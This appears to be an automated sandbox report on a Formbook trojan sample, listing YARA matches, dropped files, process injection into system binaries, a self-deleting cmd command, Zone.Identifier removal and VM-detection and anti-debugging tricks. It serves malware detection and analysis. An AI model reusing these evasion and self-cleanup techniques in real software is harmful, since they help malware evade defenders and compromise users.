          Source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.0.AddInProcess32.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.0.AddInProcess32.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 11.0.AddInProcess32.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.0.AddInProcess32.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@3/2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exeVirustotal: Detection: 33%
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exeReversingLabs: Detection: 36%
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe'
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: AddInProcess32.pdb source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.722611270.0000000006220000.00000004.00000001.sdmp, AddInProcess32.exe, systray.exe, 00000011.00000002.900574783.0000000000423000.00000004.00000020.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: systray.pdb source: AddInProcess32.exe, 0000000B.00000002.803736776.0000000001359000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.748974641.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: systray.pdbGCTL source: AddInProcess32.exe, 0000000B.00000002.803736776.0000000001359000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, systray.exe, 00000011.00000002.901215283.000000000466F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, systray.exe
          Source: Binary string: AddInProcess32.pdbpw source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000003.722611270.0000000006220000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000B.00000000.725190319.0000000000CD2000.00000002.00020000.sdmp, systray.exe, 00000011.00000002.900574783.0000000000423000.00000004.00000020.sdmp, AddInProcess32.exe.1.dr
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.748974641.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeCode function: 1_2_003A3F39 pushfd ; ret 1_2_003A3F49
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeCode function: 1_2_003A3D29 push esp; ret 1_2_003A3D34
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeCode function: 1_2_003A2320 push 450963C2h; retf 1_2_003A2352
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeCode function: 1_2_003A3111 push 0000001Bh; iretd 1_2_003A3116
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeCode function: 1_2_003A230E push 450963C2h; retf 1_2_003A2352
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeCode function: 1_2_003A22B4 push ecx; retf 1_2_003A22B5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeCode function: 1_2_003A3AD7 push esi; iretd 1_2_003A3AD8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeCode function: 1_2_06610A2A push ds; ret 1_2_06610A51
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeCode function: 1_2_06614F63 push es; iretd 1_2_06615094
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeCode function: 1_2_066105E6 pushfd ; iretd 1_2_06610613
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0041B3F2 push eax; ret 11_2_0041B3F8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0041B3FB push eax; ret 11_2_0041B462
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0041B3A5 push eax; ret 11_2_0041B3F8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0041B45C push eax; ret 11_2_0041B462
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0041C4CB push es; iretd 11_2_0041C4CC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_00415E0D push ecx; iretd 11_2_00415E1D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0180D0D1 push ecx; ret 11_2_0180D0E4
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_045CD0D1 push ecx; ret 17_2_045CD0E4
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CDB3FB push eax; ret 17_2_02CDB462
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CDB3F2 push eax; ret 17_2_02CDB3F8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CDB3A5 push eax; ret 17_2_02CDB3F8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CC000A push edx; ret 17_2_02CC000B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CD5E0D push ecx; iretd 17_2_02CD5E1D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CDC4CB push es; iretd 17_2_02CDC4CC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 17_2_02CDB45C push eax; ret 17_2_02CDB462
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, Fs7/k3S.csHigh entropy of concatenated method names: '.ctor', 'Rc8', 'Pp8', 'g2Z', 'w2Z', 'Cg3', 'e8H', 'Xn9', 'Fx2', 'Yy2'
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, Lk46/Tn40.csHigh entropy of concatenated method names: '.ctor', 'p2EP', 'Kx1s', 'Ab5a', 'Xf51', 'z6MZ', 'Yf2j', 'd0SN', 'Zd3y', 'z3C9'
          Source: 1.0.SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.3a0000.0.unpack, Fs7/k3S.csHigh entropy of concatenated method names: '.ctor', 'Rc8', 'Pp8', 'g2Z', 'w2Z', 'Cg3', 'e8H', 'Xn9', 'Fx2', 'Yy2'
          Source: 1.0.SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.3a0000.0.unpack, Lk46/Tn40.csHigh entropy of concatenated method names: '.ctor', 'p2EP', 'Kx1s', 'Ab5a', 'Xf51', 'z6MZ', 'Yf2j', 'd0SN', 'Zd3y', 'z3C9'
          Source: 1.2.SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.3a0000.0.unpack, Fs7/k3S.csHigh entropy of concatenated method names: '.ctor', 'Rc8', 'Pp8', 'g2Z', 'w2Z', 'Cg3', 'e8H', 'Xn9', 'Fx2', 'Yy2'
          Source: 1.2.SecuriteInfo.com.Trojan.Packed2.43183.29557.exe.3a0000.0.unpack, Lk46/Tn40.csHigh entropy of concatenated method names: '.ctor', 'p2EP', 'Kx1s', 'Ab5a', 'Xf51', 'z6MZ', 'Yf2j', 'd0SN', 'Zd3y', 'z3C9'
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          Hides that the sample has been downloaded from the Internet (zone.identifier)
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeFile opened: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe\:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 0000000002CC85E4 second address: 0000000002CC85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 0000000002CC896E second address: 0000000002CC8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_004088A0 rdtsc 11_2_004088A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeWindow / User API: threadDelayed 1457Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeWindow / User API: threadDelayed 8364Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe TID: 7088Thread sleep time: -25825441703193356s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe TID: 6188Thread sleep count: 1457 > 30Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe TID: 6188Thread sleep count: 8364 > 30Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe TID: 7088Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeThread delayed: delay time: 30000Jump to behavior
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.740075320.0000000005770000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000000.748521488.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 0000000C.00000000.753250873.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.749612554.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exeBinary or memory string: Dk/mhgfsdcb
          Source: explorer.exe, 0000000C.00000000.753725854.000000000A897000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAb
          Source: explorer.exe, 0000000C.00000000.745317933.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.740075320.0000000005770000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000000.748521488.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 0000000C.00000000.753363013.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.740075320.0000000005770000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000000.748521488.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 0000000C.00000000.745317933.0000000004710000.00000004.00000001.sdmpBinary or memory string: fb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&f
          Source: explorer.exe, 0000000C.00000000.753421998.000000000A782000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: SecuriteInfo.com.Trojan.Packed2.43183.29557.exe, 00000001.00000002.740075320.0000000005770000.00000002.00000001.sdmp, explorer.exe, 0000000C.00000000.748521488.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 0000000C.00000000.753849271.000000000A9A2000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_00409B10 LdrLoadDll,11_2_00409B10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017BB171 mov eax, dword ptr fs:[00000030h]11_2_017BB171
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017BC962 mov eax, dword ptr fs:[00000030h]11_2_017BC962
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_018749A4 mov eax, dword ptr fs:[00000030h]11_2_018749A4
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_018369A6 mov eax, dword ptr fs:[00000030h]11_2_018369A6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DB944 mov eax, dword ptr fs:[00000030h]11_2_017DB944
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_018351BE mov eax, dword ptr fs:[00000030h]11_2_018351BE
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E513A mov eax, dword ptr fs:[00000030h]11_2_017E513A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017D4120 mov eax, dword ptr fs:[00000030h]11_2_017D4120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017D4120 mov ecx, dword ptr fs:[00000030h]11_2_017D4120
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_018441E8 mov eax, dword ptr fs:[00000030h]11_2_018441E8
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B9100 mov eax, dword ptr fs:[00000030h]11_2_017B9100
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017BB1E1 mov eax, dword ptr fs:[00000030h]11_2_017BB1E1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E61A0 mov eax, dword ptr fs:[00000030h]11_2_017E61A0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E2990 mov eax, dword ptr fs:[00000030h]11_2_017E2990
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017EA185 mov eax, dword ptr fs:[00000030h]11_2_017EA185
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DC182 mov eax, dword ptr fs:[00000030h]11_2_017DC182
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01833884 mov eax, dword ptr fs:[00000030h]11_2_01833884
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017D0050 mov eax, dword ptr fs:[00000030h]11_2_017D0050
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017DA830 mov eax, dword ptr fs:[00000030h]11_2_017DA830
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017E002D mov eax, dword ptr fs:[00000030h]11_2_017E002D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0184B8D0 mov eax, dword ptr fs:[00000030h]11_2_0184B8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0184B8D0 mov ecx, dword ptr fs:[00000030h]11_2_0184B8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0184B8D0 mov eax, dword ptr fs:[00000030h]11_2_0184B8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0184B8D0 mov eax, dword ptr fs:[00000030h]11_2_0184B8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0184B8D0 mov eax, dword ptr fs:[00000030h]11_2_0184B8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_0184B8D0 mov eax, dword ptr fs:[00000030h]11_2_0184B8D0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017CB02A mov eax, dword ptr fs:[00000030h]11_2_017CB02A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017CB02A mov eax, dword ptr fs:[00000030h]11_2_017CB02A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017CB02A mov eax, dword ptr fs:[00000030h]11_2_017CB02A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017CB02A mov eax, dword ptr fs:[00000030h]11_2_017CB02A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01837016 mov eax, dword ptr fs:[00000030h]11_2_01837016
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01837016 mov eax, dword ptr fs:[00000030h]11_2_01837016
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_01837016 mov eax, dword ptr fs:[00000030h]11_2_01837016
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B58EC mov eax, dword ptr fs:[00000030h]11_2_017B58EC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B40E1 mov eax, dword ptr fs:[00000030h]11_2_017B40E1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B40E1 mov eax, dword ptr fs:[00000030h]11_2_017B40E1
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 11_2_017B40E1 mov eax, dword ptr fs:[00000030h]11_2_017B40E1
